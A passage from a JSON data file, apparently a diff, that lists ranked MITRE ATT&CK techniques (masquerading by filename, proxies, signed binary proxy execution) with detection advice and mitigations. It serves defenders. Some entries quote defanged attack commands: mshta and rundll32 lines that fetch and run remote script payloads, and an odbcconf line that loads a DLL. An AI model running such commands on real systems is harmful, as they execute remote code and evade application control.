"Masquerading: Space after Filename", + "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", + "url": "https://attack.mitre.org/techniques/T1036/006", + "detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.", + "mitigations": [] + }, + { + "tid": "T1036.007", + "name": "Masquerading: Double File Extension", + "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain Initial Access into a user’s system via Spearphishing Attachment then User Execution. For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", + "url": "https://attack.mitre.org/techniques/T1036/007", + "detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + } + ] + }, + { + "rank": 13, + "tid": "T1090", + "name": "Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "url": "https://attack.mitre.org/techniques/T1090", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\nConsider monitoring for traffic to known anonymity networks (such as Tor).", + "score": 2.011595238095238, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [ + { + "tid": "T1090.001", + "name": "Proxy: Internal Proxy", + "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", + "url": "https://attack.mitre.org/techniques/T1090/001", + "detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1090.002", + "name": "Proxy: External Proxy", + "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.", + "url": "https://attack.mitre.org/techniques/T1090/002", + "detection": "Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1090.003", + "name": "Proxy: Multi-hop Proxy", + "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging Patch System Image, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the Network Boundary Bridging method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.", + "url": "https://attack.mitre.org/techniques/T1090/003", + "detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1090.004", + "name": "Proxy: Domain Fronting", + "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", + "url": "https://attack.mitre.org/techniques/T1090/004", + "detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", + "mitigations": [ + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + } + ] + } + ] + }, + { + "rank": 14, + "tid": "T1218", + "name": "Signed Binary Proxy Execution", + "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.", + "url": "https://attack.mitre.org/techniques/T1218", + "detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.", + "score": 1.9333333333333333, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ], + "subtechniques": [ + { + "tid": "T1218.001", + "name": "Signed Binary Proxy Execution: Compiled HTML File", + "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)", + "url": "https://attack.mitre.org/techniques/T1218/001", + "detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.002", + "name": "Signed Binary Proxy Execution: Control Panel", + "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\nMalicious Control Panel items can be delivered via Phishing campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", + "url": "https://attack.mitre.org/techniques/T1218/002", + "detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before Rundll32 is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter Rundll32 command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n
    \n
  • Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
    • \n
  • CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)
    • \n
  • Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
    • \n
\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.003", + "name": "Signed Binary Proxy Execution: CMSTP", + "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\nCMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", + "url": "https://attack.mitre.org/techniques/T1218/003", + "detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n
    \n
  • To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
    • \n
  • To detect Bypass User Account Control via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
    • \n
", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.004", + "name": "Signed Binary Proxy Execution: InstallUtil", + "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", + "url": "https://attack.mitre.org/techniques/T1218/004", + "detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.005", + "name": "Signed Binary Proxy Execution: Mshta", + "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", + "url": "https://attack.mitre.org/techniques/T1218/005", + "detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.007", + "name": "Signed Binary Proxy Execution: Msiexec", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)", + "url": "https://attack.mitre.org/techniques/T1218/007", + "detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.008", + "name": "Signed Binary Proxy Execution: Odbcconf", + "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) ", + "url": "https://attack.mitre.org/techniques/T1218/008", + "detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.009", + "name": "Signed Binary Proxy Execution: Regsvcs/Regasm", + "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", + "url": "https://attack.mitre.org/techniques/T1218/009", + "detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.010", + "name": "Signed Binary Proxy Execution: Regsvr32", + "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)", + "url": "https://attack.mitre.org/techniques/T1218/010", + "detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)", + "mitigations": [ + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ] + }, + { + "tid": "T1218.011", + "name": "Signed Binary Proxy Execution: Rundll32", + "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\nRundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, 